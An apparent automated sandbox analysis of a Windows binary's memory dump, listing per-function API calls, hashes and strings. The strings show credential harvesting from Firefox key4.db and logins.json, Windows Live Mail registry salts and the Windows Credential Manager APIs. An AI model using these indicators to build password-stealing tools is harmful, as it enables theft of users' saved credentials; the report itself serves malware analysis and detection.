                                                                                                                  • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                  • Opcode Fuzzy Hash: de300881e20ea23b7bb50552807e946df4066f391255ce58fe159596e1188ae6
                                                                                                                  • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                  • memset.MSVCRT ref: 0040128E
                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2998058495-0
                                                                                                                  • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                  • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                    • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                  • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                  • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                  • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                  • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                  • SetFocus.USER32(?,00000000), ref: 0040BECE
                                                                                                                  • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                  • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                  • strlen.MSVCRT ref: 0040BEFE
                                                                                                                  • strlen.MSVCRT ref: 0040BF0C
                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                    • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                    • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                  • memset.MSVCRT ref: 0040BFDB
                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                   • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                  • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                  • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                  • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                  • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                  • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                  • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                   • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                  • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                   • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00406782
                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                  • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                                  • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                  • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                  • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                                  • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                  • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                  • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                  • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                  • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                  Strings
                                                                                                                  • , xrefs: 00406834
                                                                                                                  • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                  • key4.db, xrefs: 00406756
                                                                                                                  • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                   • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                  • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A973
                                                                                                                  • memset.MSVCRT ref: 0040A996
                                                                                                                  • memset.MSVCRT ref: 0040A9AC
                                                                                                                  • memset.MSVCRT ref: 0040A9BC
                                                                                                                  • sprintf.MSVCRT ref: 0040A9F0
                                                                                                                  • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                                  • sprintf.MSVCRT ref: 0040AABE
                                                                                                                  • _mbscat.MSVCRT ref: 0040AAED
                                                                                                                    • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                                  • sprintf.MSVCRT ref: 0040AB21
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                   • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                   • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: sprintf$memset$_mbscpy
                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                    • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                    • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                  • strlen.MSVCRT ref: 0040F139
                                                                                                                  • strlen.MSVCRT ref: 0040F147
                                                                                                                  • memset.MSVCRT ref: 0040F187
                                                                                                                  • strlen.MSVCRT ref: 0040F196
                                                                                                                  • strlen.MSVCRT ref: 0040F1A4
                                                                                                                  • memset.MSVCRT ref: 0040F1EA
                                                                                                                  • strlen.MSVCRT ref: 0040F1F9
                                                                                                                  • strlen.MSVCRT ref: 0040F207
                                                                                                                  • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                  • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                  • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                   • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C3F7
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                  • strrchr.MSVCRT ref: 0040C417
                                                                                                                  • _mbscat.MSVCRT ref: 0040C431
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                  • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                   • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi
                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00444612
                                                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                  • strlen.MSVCRT ref: 0044462E
                                                                                                                  • memset.MSVCRT ref: 00444668
                                                                                                                  • memset.MSVCRT ref: 0044467C
                                                                                                                  • memset.MSVCRT ref: 00444690
                                                                                                                  • memset.MSVCRT ref: 004446B6
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                  • String ID: salu
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                  • strlen.MSVCRT ref: 00443AD2
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                                                  • memset.MSVCRT ref: 00443B2E
                                                                                                                  • memset.MSVCRT ref: 00443B4B
                                                                                                                  • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                  • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                    • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                  • Salt, xrefs: 00443BA7
                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                  • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                  • memset.MSVCRT ref: 0040F84A
                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                  • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                                  APIs
                                                                                                                  • sprintf.MSVCRT ref: 0040957B
                                                                                                                  • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                    • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                    • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                    • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                    • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                  • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                  • sprintf.MSVCRT ref: 004095EB
                                                                                                                  • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                  • memset.MSVCRT ref: 0040961C
                                                                                                                  • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                  • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                  • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                  • String ID: caption$dialog_%d$menu_%d
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                  • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                  • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                  • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$FreeLoad
                                                                                                                  • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                  APIs
                                                                                                                  • wcsstr.MSVCRT ref: 0040426A
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                  • strchr.MSVCRT ref: 004042F6
                                                                                                                  • strlen.MSVCRT ref: 0040430A
                                                                                                                  • sprintf.MSVCRT ref: 0040432B
                                                                                                                  • strchr.MSVCRT ref: 0040433C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
